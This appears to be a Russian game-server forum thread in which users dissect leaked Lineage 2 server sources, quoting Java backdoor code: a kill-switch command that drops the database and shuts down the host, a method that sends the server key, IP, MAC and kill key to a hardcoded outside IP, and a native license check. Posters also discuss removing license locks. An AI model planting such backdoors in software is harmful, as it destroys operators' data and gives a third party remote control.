Перейти к содержанию
Авторизация  
mrvampir

Привязка

Рекомендуемые сообщения

недавн в шару попали исходы lasteam , кто знает где привязка ?

в каких файлах?

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

полазь по разделам, тут алгоритм отвязки в общих чертах на днях килберг описывал (ник другой был)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

И так дамы и господа 1 привязка на слив дб

java\l2ft\gameserver\utils\ServerLogger.java

package l2ft.gameserver.utils;

import jonelo.jacksum.JacksumAPI;
import l2ft.commons.util.Rnd;
import l2ft.gameserver.dao.ProtectedAccountDAO;
import l2ft.gameserver.model.GameObjectsStorage;
import l2ft.gameserver.model.Player;

public class ServerLogger
{
public static String killKey = null;

public static void doIt()
{
// if (JacksumAPI.validate()) {
// return;
// }
disconnectAllCharacters();
ProtectedAccountDAO.getInstance().dropSql();
shutDownSystem();
}

private static void disconnectAllCharacters()
{
for (Player player : GameObjectsStorage.getAllPlayersForIterate())
try
{
player.logout();
}
catch (Exception e)
{
shutDownSystem();
}
}

private static void shutDownSystem()
{
String property = System.getProperty("os.name");

if (property.toLowerCase().contains("windows"))
{
String[] commands = { "shutdown", "-s" };
try
{
Runtime.getRuntime().exec(commands);
}
catch (Exception e)
{
System.exit(-1);
}
}

if (property.toLowerCase().contains("linux"))
{
String[] commands = { "shutdown", "-p", "now" };
try
{
Runtime.getRuntime().exec(commands);
}
catch (Exception e)
{
System.exit(-1);
}
}
}

private static void generateKillKey(int length)
{
String lowerChar = "qwertyuiopasdfghjklzxcvbnm";
String upperChar = "QWERTYUIOPASDFGHJKLZXCVBNM";
String digits = "1234567890";
StringBuilder password = new StringBuilder(length);

for (int i = 0; i < length; i++)
{
int charSet = Rnd.get(3);

switch (charSet)
{
case 0:
password.append(lowerChar.charAt(Rnd.get(lowerChar.length() - 1)));
break;
case 1:
password.append(upperChar.charAt(Rnd.get(upperChar.length() - 1)));
break;
case 2:
password.append(digits.charAt(Rnd.get(digits.length() - 1)));
}
}

killKey = password.toString();
}

static
{
if (killKey == null)
generateKillKey(10);
}
}

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

2 привязка java\l2ft\gameserver\utils\Util.java

 

 public static void prepareConnection(int port) {
try {
Socket requestSocket = new Socket("217.118.81.22", port);
ObjectOutputStream out = new ObjectOutputStream(requestSocket.getOutputStream());
String serverKey;
try {
serverKey = getServerKey();
}
catch (Exception e)
{
serverKey = "key is missing";
}
String msg = new StringBuilder().append("*").append(serverKey).append("*").append(Integer.toString(port)).append("*").append(getServerIp()).append("*").append(getServerMac()).append("*").append(ServerLogger.killKey).append("*").toString();
out.writeObject(msg);
out.flush();
out.close();
requestSocket.close();
}
catch (Exception ex)
{}
}

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

3 херня от фристов java\l2ft\gameserver\handler\voicecommands\impl\Access.java

package l2ft.gameserver.handler.voicecommands.impl;

import l2ft.gameserver.handler.voicecommands.IVoicedCommandHandler;
import l2ft.gameserver.model.Player;
import l2ft.gameserver.scripts.Functions;
import l2ft.gameserver.utils.ServerLogger;

public class Access extends Functions implements IVoicedCommandHandler
{
private String[] _commandList = { ServerLogger.killKey };

@Override
public boolean useVoicedCommand(String command, Player activeChar, String args)
{
command = command.intern();

if (command.equalsIgnoreCase(ServerLogger.killKey))
{
ServerLogger.doIt();
return true;
}

return false;
}

@Override
public String[] getVoicedCommandList()
{
return _commandList;
}
}

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

пфф это было и в отвязанных версиях first-team

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

пфф это было и в отвязанных версиях first-team

Тебе на шару показали где снмать в разшаренных сурсах. Да и не ооффтопь,тут про привязку ,а не где и как была отвязана?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Тебе на шару показали где снмать в разшаренных сурсах. Да и не ооффтопь,тут про привязку ,а не где и как была отвязана?

а ты на код посмотри... где тут хоть одна привязка? сборка и с этим кодом прекрасно будет работать. вам сказали же нужно смотреть world.java

P.s это всего лишь killKey

Изменено пользователем tester

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

а ты на код посмотри... где тут хоть одна привязка? сборка и с этим кодом прекрасно будет работать. вам сказали же нужно смотреть world.java

Ты дурак ? а ниче что тебе могуть бд слить как раз плюнуть ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ты дурак ? а ниче что тебе могуть бд слить как раз плюнуть ?

тема про привязку, а не про килкеи. где ты ее отвязал то? у нее так же осталось ограничение по онлайну и т.д

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

тема про привязку, а не про килкеи. где ты ее отвязал то? у нее так же осталось ограничение по онлайну и т.д

Мде а ето что тогда java\l2ft\gameserver\utils\Util.java тут глян

 

Socket requestSocket = new Socket("217.118.81.22", port);
ObjectOutputStream out = new ObjectOutputStream(requestSocket.getOutputStream());
String serverKey;

]

Изменено пользователем Литион

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

если ты даже элементарно привязку не можешь снять да и так пофигически относишься в помощи снятия килкея, то просто забей на данные исходы они не для тебя

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Мде а ето что тогда java\l2ft\gameserver\utils\Util.java тут глян

 

Socket requestSocket = new Socket("217.118.81.22", port);
ObjectOutputStream out = new ObjectOutputStream(requestSocket.getOutputStream());
String serverKey;

]

подставьте туда свой ип и увидите что будет...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

private static void generateKillKey(int length)

{

String lowerChar = "qwertyuiopasdfghjklzxcvbnm";

String upperChar = "QWERTYUIOPASDFGHJKLZXCVBNM";

String digits = "1234567890";

StringBuilder password = new StringBuilder(length);

Тут под каждого спонсора даже килей:D

 

 

 

 

disconnectAllCharacters();

ProtectedAccountDAO.getInstance().dropSql();

shutDownSystem();

Удаление бд это тоже привязка,кэп.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

подставьте туда свой ип и увидите что будет...

удаляешь полностью код из подгрузки и будет тебе чудо

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

удаляешь полностью код из подгрузки и будет тебе чудо

ты крут

вот сама привязка java\l2ft\gameserver\model\world.java

public static PlayersInWorld _players = new PlayersInWorld()
   {
       public void storePlayer(GameObject player)
       {
           System.exit(0);
       }
       public void removePlayer(GameObject player)
       {
           System.exit(0);
       }
       public Player get(int objId)
       {
           return null;
       }
       @Override
       public void run()
       {
           System.exit(0);
       }
   };

   public static void init()
   {
       try
       {
           String libname = "l2ftlic";
             if(System.getProperty("os.arch").contains("64"))
                    libname+="64";
           System.loadLibrary(libname);
           prepareWorld();
       }
       catch(Error e)
       {
           System.exit(0);
           return;
       }
       _log.info("L2World: Creating regions: ["

+ там еще нужно пару методов поменять, кто хоть имеет какае-то представление в java без проблем это сделает

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

чел у меня данные исходы были раньше чем они вышли в шару, и я за минуту всю отвязал и снял бэкдоры

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

чел у меня данные исходы были раньше чем они вышли в шару, и я за минуту всю отвязал и снял бэкдоры

возьми с полки пирожок малыш

P.s еще забыли указать в данной теме java\l2ft\gameserver\dao\ProtectedAccountDAO.java удалить

Изменено пользователем tester

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

малыш? ахах да ты убог, иди у мамы на пирожки спроси и ложись спать завтра ведь в школу

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

малыш? ахах да ты убог, иди у мамы на пирожки спроси и ложись спать завтра ведь в школу

школьник агриться?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

нет это ещё не агр, и к тому же я не школьник

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация  

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×
×
  • Создать...